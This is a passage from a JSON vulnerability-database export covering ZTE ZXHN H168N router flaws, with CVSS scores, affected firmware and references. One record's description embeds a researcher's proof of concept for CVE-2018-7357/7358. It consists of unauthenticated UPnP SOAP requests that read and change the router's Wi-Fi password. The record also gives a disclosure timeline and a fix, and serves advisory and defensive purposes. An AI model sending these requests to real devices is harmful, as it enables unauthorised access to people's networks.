"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk11t:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:2.2.0_pk1.2t5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7358"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Usman Saeed",
"sources": [
{
"db": "BID",
"id": "105963"
},
{
"db": "PACKETSTORM",
"id": "150728"
}
],
"trust": 0.4
},
"cve": "CVE-2018-7358",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7358",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "VHN-137390",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "psirt@zte.com.cn",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7358",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7358",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "psirt@zte.com.cn",
"id": "CVE-2018-7358",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201811-445",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-137390",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137390"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXHN H168N product with versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper change control vulnerability, which may allow an unauthorized user to perform unauthorized operations. ZTE ZXHN H168N The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. \nZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is China\u0027s ZTE Corporation ( ZTE ) company\u2019s a wireless VDSL router. ZTE ZXHN H168N There are security holes in . The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5 Version, V2.2.0_PK1.2T2 Version, V2.2.0_PK11T7 Version, V2.2.0_PK11T Version. [*] POC: (CVE-2018-7357 and CVE-2018-7358)\n\n\n\n\nDisclaimer: [This POC is for Educational Purposes , I would Not be\n\n\nresponsible for any misuse of the information mentioned in this blog post]\n\n\n\n\n[+] Unauthenticated\n\n\n\n\n[+] Author: Usman Saeed (usman [at] xc0re.net)\n\n\n\n\n[+] Protocol: UPnP\n\n\n\n\n[+] Affected Harware/Software:\n\n\n\n\nModel name: ZXHN H168N v2.2\n\n\n\n\nBuild Timestamp: 20171127193202\n\n\n\n\nSoftware Version: V2.2.0_PK1.2T5\n\n\n\n\n[+] Findings:\n\n\n\n\n1. Unauthenticated access to WLAN password:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 288\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\" 1\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003c/u:GetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n2. Unauthenticated WLAN passphrase change:\n\n\n\n\nPOST /control/igd/wlanc_1_1 HTTP/1.1\n\n\nHost: \u003cIP\u003e:52869\n\n\nUser-Agent: {omitted}\n\n\nContent-Length: 496\n\n\nConnection: close\n\n\nContent-Type: text/xml; charset=\"utf-8\"\n\n\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys\"\n\n\n\n\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\n\n\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:Body\u003e\u003cu:SetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"\u003e\u003cNewWEPKey0\u003e{omitted}\u003c/NewWEPKey0\u003e\u003cNewWEPKey1\u003e{omitted}\u003c/NewWEPKey1\u003e\u003cNewWEPKey2\u003e{omitted}\u003c/NewWEPKey2\u003e\u003cNewWEPKey3\u003e{omitted}\u003c/NewWEPKey3\u003e\u003cNewPreSharedKey\u003e{omitted}\u003c/NewPreSharedKey\u003e\u003cNewKeyPassphrase\u003e{omitted}\u003c/NewKeyPassphrase\u003e\u003c/u:SetSecurityKeys\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\n\n\n\n\n[*] Solution:\n\n\n\n\nUPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices. \n\n\n\n\n[*] Note:\n\n\n\n\nThere are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same. \n\n\n\n\n[+] Responsible Disclosure:\n\n\n\n\nVulnerabilities identified - 20 August, 2018\n\n\n\n\nReported to ZTE - 28 August, 2018\n\n\n\n\nZTE official statement - 17 September 2018\n\n\n\n\nZTE patched the vulnerability - 12 November 2018\n\n\n\n\nThe operator pushed the update - 12 November 2018\n\n\n\n\nCVE published - CVE- 2018-7357 and CVE-2018-7358\n\n\n\n\nPublic disclosure - 12 November 2018\n\n\n\n\nRef: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522\n\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "BID",
"id": "105963"
},
{
"db": "VULHUB",
"id": "VHN-137390"
},
{
"db": "PACKETSTORM",
"id": "150728"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7358",
"trust": 2.9
},
{
"db": "BID",
"id": "105963",
"trust": 2.0
},
{
"db": "ZTE",
"id": "1009523",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "45972",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201811-445",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-137390",
"trust": 0.1
},
{
"db": "ZTE",
"id": "1009522",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "150728",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137390"
},
{
"db": "BID",
"id": "105963"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "PACKETSTORM",
"id": "150728"
},
{
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"id": "VAR-201811-0984",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-137390"
}
],
"trust": 0.47662336000000005
},
"last_update_date": "2023-12-18T12:28:36.568000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Improper Authorization Vulnerabilities in ZTE ZXHN H168N Product",
"trust": 0.8,
"url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523"
},
{
"title": "ZTE ZXHN H168N Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=86848"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137390"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "NVD",
"id": "CVE-2018-7358"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/105963"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/45972/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7358"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7358"
},
{
"trust": 0.3,
"url": "http://www.zte.com.cn/"
},
{
"trust": 0.1,
"url": "http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:getsecuritykeys"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7357"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cs:body\u003e\u003cu:setsecuritykeys"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-137390"
},
{
"db": "BID",
"id": "105963"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "PACKETSTORM",
"id": "150728"
},
{
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-137390"
},
{
"db": "BID",
"id": "105963"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"db": "PACKETSTORM",
"id": "150728"
},
{
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-11-14T00:00:00",
"db": "VULHUB",
"id": "VHN-137390"
},
{
"date": "2018-11-15T00:00:00",
"db": "BID",
"id": "105963"
},
{
"date": "2019-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"date": "2018-12-11T01:49:45",
"db": "PACKETSTORM",
"id": "150728"
},
{
"date": "2018-11-14T15:29:02.220000",
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"date": "2018-11-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-137390"
},
{
"date": "2018-11-15T00:00:00",
"db": "BID",
"id": "105963"
},
{
"date": "2019-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012683"
},
{
"date": "2019-10-09T23:42:15.660000",
"db": "NVD",
"id": "CVE-2018-7358"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXHN H168N Authentication vulnerabilities in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012683"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-445"
}
],
"trust": 0.6
}
}
var-202104-2029
Vulnerability from variot
ZTE Corporation is the world's leading provider of integrated communications solutions.
ZTE Corporation ZXHN H168N has an unauthorized access vulnerability. Attackers can use the vulnerability to obtain sensitive information.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202104-2029",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h168n",
"scope": null,
"trust": 0.6,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-18273",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2021-18273",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE Corporation is the world\u0027s leading provider of integrated communications solutions.\n\r\n\r\nZTE Corporation ZXHN H168N has an unauthorized access vulnerability. Attackers can use the vulnerability to obtain sensitive information.",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
],
"trust": 0.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-18273",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
]
},
"id": "VAR-202104-2029",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
],
"trust": 0.97662336
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
]
},
"last_update_date": "2022-05-04T09:55:13.700000Z",
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-18273"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-18273"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE Corporation ZXHN H168N has an unauthorized access vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-18273"
}
],
"trust": 0.6
}
}
var-202106-0821
Vulnerability from variot
A ZTE product has an information leak vulnerability. Due to improper permission settings, an attacker with ordinary user permissions could exploit this vulnerability to obtain some sensitive user information through the wizard page without authentication. This affects ZXHN H168N all versions up to V3.5.0_EG1T4_TE. ZXHN H168N There is a vulnerability in improper retention of permissions.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-0821",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h168n",
"scope": "lte",
"trust": 1.0,
"vendor": "zte",
"version": "3.5.0_eg1t4_te"
},
{
"model": "zxhn h168n",
"scope": "eq",
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h168n",
"scope": "lte",
"trust": 0.8,
"vendor": "zte",
"version": "zxhn h168n firmware 3.5.0_eg1t4_te until"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007929"
},
{
"db": "NVD",
"id": "CVE-2021-21735"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h168n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.5.0_eg1t4_te",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxhn_h168n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-21735"
}
]
},
"cve": "CVE-2021-21735",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-21735",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
